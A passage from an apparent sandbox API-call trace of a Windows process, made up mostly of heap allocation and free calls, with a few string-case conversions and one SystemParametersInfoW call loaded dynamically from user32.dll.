Flags=0x0, Size=0x10) returned 0x34aa9d0 [0314.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0314.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0314.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0314.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0314.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0314.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0314.170] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0314.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0314.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0314.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0314.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0314.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0314.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0314.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0314.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0314.171] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0314.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0314.171] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0314.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0314.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0314.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0314.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0314.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0314.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0314.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0314.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0314.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0314.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0314.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0314.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0314.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0314.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0314.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0314.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0314.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0314.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0314.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0314.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0314.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0314.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0314.174] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0314.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0314.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0314.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0314.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0314.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0314.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0314.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0314.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0314.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0314.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0314.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0314.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0314.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0314.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0314.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0314.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0314.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0314.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0314.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0314.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0314.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0314.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0314.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0314.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0314.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0314.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0314.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0314.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0314.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0314.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0314.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0314.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0314.177] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0314.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0314.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0314.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0314.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0314.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0314.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0314.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0314.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0314.178] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0314.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0314.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0314.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0314.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0314.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0314.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0314.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0314.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0314.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0314.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0314.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0314.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0314.178] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0314.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0314.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0314.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0314.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0314.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0314.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0314.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0314.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0314.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0314.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0314.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0314.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0314.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0314.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0314.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0314.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0314.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0314.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0314.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0314.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0314.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0314.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0314.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0314.275] FreeLibrary (hLibModule=0x74f40000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0314.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0314.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0314.276] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0314.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0314.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0314.276] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0314.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0314.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0314.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0314.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0314.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0314.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: 